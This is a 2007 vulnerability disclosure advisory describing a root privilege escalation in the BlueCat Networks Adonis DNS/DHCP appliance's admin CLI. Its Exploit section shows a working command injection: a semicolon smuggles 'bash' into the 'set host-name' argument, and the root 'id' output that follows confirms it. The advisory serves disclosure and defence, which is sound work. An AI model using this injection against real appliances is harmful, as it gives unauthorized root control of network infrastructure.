Template Security Security Advisory
-----------------------------------
BlueCat Networks Adonis CLI root privilege escalation
Date: 2007-08-16
Advisory ID: TS-2007-003-0
Vendor: BlueCat Networks, http://www.bluecatnetworks.com/
Revision: 0
Contents
--------
Summary
Software Version
Details
Impact
Exploit
Workarounds
Obtaining Patched Software
Credits
Revision History
Summary
-------
Template Security has discovered a root privilege escalation
vulnerability in the BlueCat Networks Adonis DNS/DHCP appliance
which allows the admin user to gain root privilege from the
Command Line Interface (CLI).
Software Version
----------------
Adonis version 5.0.2.8 was tested.
Details
-------
The admin account on the Adonis DNS/DHCP appliance provides
access to a CLI that allows an administrator to perform tasks
such as setting the IP address, netmask, system time and system
hostname. By entering a certain command sequence, the
administrator is able to execute a command as root.
Impact
------
Access to the admin account is the same as root access on the
appliance.
Exploit
-------
Here we use the 'set host-name' CLI command to execute a root
shell:
:adonis>set host-name ;bash
adonis.katter.org
root@adonis:~# id
uid=0(root) gid=0(root) groups=0(root)
NOTE: There may be other command sequences that accomplish the
same result.
Workarounds
-----------
Only provide admin account access to administrators that also
have root account access on the appliance.
Obtaining Patched Software
--------------------------
Contact the vendor.
Credits
-------
forloop discovered this vulnerability while enjoying a Tuborg
Gold. forloop is a member of Template Security.
Revision History
----------------
2007-08-16: Revision 0 released